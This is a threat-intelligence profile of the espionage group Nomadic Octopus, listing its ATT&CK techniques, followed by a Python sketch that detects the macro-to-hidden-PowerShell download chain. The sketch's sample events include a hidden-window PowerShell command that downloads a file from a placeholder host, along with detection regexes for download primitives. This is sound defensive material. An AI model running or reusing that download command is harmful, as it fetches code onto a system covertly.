Nomadic Octopus

Nomadic Octopus is a Russian-speaking cyber espionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. Nomadic Octopus has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants.[1][2][3]

ID: G0133
Associated Groups: DustSquad
Version: 1.0
Created: 24 August 2021
Last Modified: 02 September 2022

Associated Group Descriptions

Name Description
DustSquad [1][2][4]

Techniques Used

Domain ID Name Use

Enterprise T1059.001 Command and Scripting Interpreter: PowerShell

Nomadic Octopus has used PowerShell for execution.[3]

Enterprise T1059.003 Command and Scripting Interpreter: Windows Command Shell

Nomadic Octopus used cmd.exe /c within a malicious macro.[3]

Enterprise T1564.003 Hide Artifacts: Hidden Window

Nomadic Octopus executed PowerShell in a hidden window.[3]

Enterprise T1105 Ingress Tool Transfer

Nomadic Octopus has used malicious macros to download additional files to the victim's machine.[3]

Enterprise T1036 Masquerading

Nomadic Octopus attempted to make Octopus appear as a Telegram Messenger with a Russian interface.[2]

Enterprise T1566.001 Phishing: Spearphishing Attachment

Nomadic Octopus has targeted victims with spearphishing emails containing malicious attachments.[1][3]

Enterprise T1204.002 User Execution: Malicious File

Nomadic Octopus has attempted to lure victims into clicking on malicious attachments within spearphishing emails.[2][3]
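The execution chain in the table above (Office macro runs cmd.exe /c, which starts PowerShell in a hidden window that fetches additional files) can be spotted in process-creation telemetry. The following is an added detection sketch, not MITRE's or any vendor's code; it assumes Sysmon-style fields (pid, ppid, image, parent_image, command_line) and uses constructed sample events.

```python
import re

# Office hosts whose child cmd.exe is suspicious (assumed list, extend as needed)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# PowerShell "-w hidden" / "-WindowStyle Hidden" (T1564.003)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.IGNORECASE)
# Common download primitives used to pull additional files (T1105)
DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|iwr\b",
                         re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def classify(event):
    """ATT&CK technique IDs a single process-creation event matches."""
    hits, parent, image = [], basename(event["parent_image"]), basename(event["image"])
    cmd = event["command_line"]
    if image == "cmd.exe" and parent in OFFICE_PARENTS and re.search(r"\s/c\s", cmd, re.I):
        hits.append("T1059.003")          # macro -> cmd.exe /c
    if image == "powershell.exe":
        hits.append("T1059.001")
        if HIDDEN_RE.search(cmd):
            hits.append("T1564.003")
        if DOWNLOAD_RE.search(cmd):
            hits.append("T1105")
    return hits

def find_macro_chains(events):
    """Link each powershell.exe to its cmd.exe parent; report (cmd pid, ps pid, techniques)."""
    by_pid = {e["pid"]: e for e in events}
    chains = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if basename(e["image"]) == "powershell.exe" and parent and "T1059.003" in classify(parent):
            chains.append((parent["pid"], e["pid"], classify(parent) + classify(e)))
    return chains

# Constructed sample events: one macro chain plus one benign cmd.exe from Explorer.
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "parent_image": r"C:\Windows\explorer.exe", "image": WORD,
     "command_line": '"WINWORD.EXE" /n invoice.doc'},
    {"pid": 200, "ppid": 100, "parent_image": WORD, "image": CMD,
     "command_line": 'cmd.exe /c powershell -w hidden -c "..."'},
    {"pid": 300, "ppid": 200, "parent_image": CMD, "image": PS,
     "command_line": "powershell -w hidden -c \"(New-Object Net.WebClient)"
                     ".DownloadFile('http://example.invalid/x','x')\""},
    {"pid": 400, "ppid": 1, "parent_image": r"C:\Windows\explorer.exe", "image": CMD,
     "command_line": "cmd.exe /c dir"},
]
```

Run `find_macro_chains(SAMPLE_EVENTS)` to get the single chain (200, 300) tagged with all four technique IDs; the benign Explorer-spawned cmd.exe produces no hit.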

Software

References